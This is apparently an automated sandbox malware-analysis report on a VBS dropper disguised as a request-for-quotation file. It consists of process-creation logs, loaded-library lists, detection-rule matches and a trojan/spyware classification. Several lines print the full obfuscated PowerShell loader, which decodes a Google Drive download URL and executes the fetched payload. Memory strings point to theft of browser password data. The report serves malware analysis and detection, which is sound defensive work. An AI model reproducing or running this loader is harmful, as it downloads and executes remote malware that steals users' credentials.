aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL Omd Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFAAC3DB296 3_2_00007FFAAC3DB296
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FFAAC3DC442 3_2_00007FFAAC3DC442
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_02E9F348 6_2_02E9F348
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_02E9FC18 6_2_02E9FC18
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_02E9F000 6_2_02E9F000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_0734CAF8 6_2_0734CAF8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0043C146 8_2_0043C146
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0043D278 8_2_0043D278
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_00435362 8_2_00435362
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0043C468 8_2_0043C468
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0043C738 8_2_0043C738
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0043E988 8_2_0043E988
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0043CA08 8_2_0043CA08
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0043CCD8 8_2_0043CCD8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_00433E09 8_2_00433E09
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0043CFAA 8_2_0043CFAA
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0043F961 8_2_0043F961
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_0043E97A 8_2_0043E97A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_004329EC 8_2_004329EC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_004369A0 8_2_004369A0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_00433B95 8_2_00433B95
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_00439DE0 8_2_00439DE0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_00436FC8 8_2_00436FC8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E1E80 8_2_265E1E80
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E0B30 8_2_265E0B30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E17A0 8_2_265E17A0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E9C70 8_2_265E9C70
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EFC68 8_2_265EFC68
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E9548 8_2_265E9548
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E2968 8_2_265E2968
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EE258 8_2_265EE258
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E1E70 8_2_265E1E70
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EDE00 8_2_265EDE00
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EE6B0 8_2_265EE6B0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EE6A9 8_2_265EE6A9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EEF60 8_2_265EEF60
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EEB08 8_2_265EEB08
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EEB01 8_2_265EEB01
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E0B20 8_2_265E0B20
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E8B91 8_2_265E8B91
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E178F 8_2_265E178F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EF3B8 8_2_265EF3B8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EF3B1 8_2_265EF3B1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E8BA0 8_2_265E8BA0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E0040 8_2_265E0040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E5018 8_2_265E5018
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EF810 8_2_265EF810
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E0038 8_2_265E0038
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E5028 8_2_265E5028
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265ED0F8 8_2_265ED0F8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265ECCA0 8_2_265ECCA0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265ED550 8_2_265ED550
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265ED549 8_2_265ED549
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265E9541 8_2_265E9541
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265EDDFF 8_2_265EDDFF
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 8_2_265ED9A8 8_2_265ED9A8
Source: #U8a62#U50f9 (RFQ) -RFQ20241010.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7102
Source: unknown Process created: Commandline size = 7102
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 7102 Jump to behavior
Source: amsi32_8036.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7620, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8036, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@8/9@5/5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Kommandocentralens.Qua Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mheptb4p.15a.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U8a62#U50f9 (RFQ) -RFQ20241010.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7620
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8036
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: msiexec.exe, 00000008.00000002.2594642585.0000000023ADD000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2594642585.0000000023AE9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2594642585.0000000023A9A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U8a62#U50f9 (RFQ) -RFQ20241010.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. 
nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL Omd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. 
nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL Omd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. 
nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp uBilm.sUdaaneOcta.r dbyg-AssesARapseGGrunde eglin GoattLeche ';$Behaviourist=Hjlpeprster 'ArchehStrant LdertHollop Aksis .imm:resgs/Wi te/Frekvd Drg r InviiHov dvKlosteMrkel.PhilagFallioCystooBudlig Fa.slSup.reLidel.friticDentaoPro,rmSanda/UnderuAarspcExtra?Eftere Gen.xUdsulpOeje oCl.irrDesigtSydga=RednidSita oKondiw aragn ulnelProgro dungaSuprad Deno&AnopliEmbusdPlak =Terre1AfvanvHoneymMagikFovertR Seto9KadenyKvaded U dyuCecilHDisco7.kopuBFr,sk2Sa.rulTrib.OU.tagF Pro ODraugQ apsoq PochcSo nkZIna,nV AlpeCSgekoVHybriG ind4 Ekspw.ilhacGrundtlserkOEu ukCrhipibSldecIOver ';$Brkop=Hjlpeprster 'Fleck>delin ';$Tvillingsstrene=Hjlpeprster 'Lith INoncoeF emmx unds ';$Eaters='Frog';$Uptore='\Kommandocentralens.Qua';Snoose (Hjlpeprster 'gaase$Undfag BibrLFlokdoMi libLsgreAAmo eladstr: ftrdHdowntiEjnerLdrivedAcy aeHep tdSte neSulp.=Rigou$Jettee TrotN nscrvP efe:PolycA RepoPProcaP UnindSelv aMajbrtNonmiARepla+B.nga$Aldisu.agskPCol.qT BefiOUnre RP,enoeSubhe ');Snoose (Hjlpeprster ',uftn$DenatGOutsmL Misto Sk lb Aft aPretrLfl.vv:S.imeLNiel SboppeBGran LCompraUnde D Biote.elev2Detin5 Sk l4Y.erl=Sabba$PredeBAtta eGarniHB omaABor eV SmokIQuibbOKommauIntuiRRapheIO stiSBilfoTAarso.ReindsOpretpA,mitlTa kei ,ibatHulsv(Docog$ PlacBCapitRpulldksapphoSkralPBasil) olyt ');Snoose (Hjlpeprster 'Flder[Tanken pejlEFa edTImple. easesSpindEUnprorFo ekVTabe iL ndbc EvinEForldpPlan,obaredILydtbNDa atTCykelmcompraWe neNBortfa .onrgKnapnE DeikrC cil] Folk:Digit:TrykksMaltreSmoldcKdkonUpen.erComm IBuscht RablYCivilpLov iRf,ugtoHenkoTUnproopaatac StaroOvernLPhi.a Efter=Na rv Teks[ esteNantite kibtJage .InstrsCarpoeToccaCC.pidura,errMenthi olumt ,ureYSemidpBoundROphavo Slagt EffiO.edthC Stvko TangL,ymniTo erfypol tP nfaEBeslu]Dilet:Filli:Dekl,t,edekL Omd Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
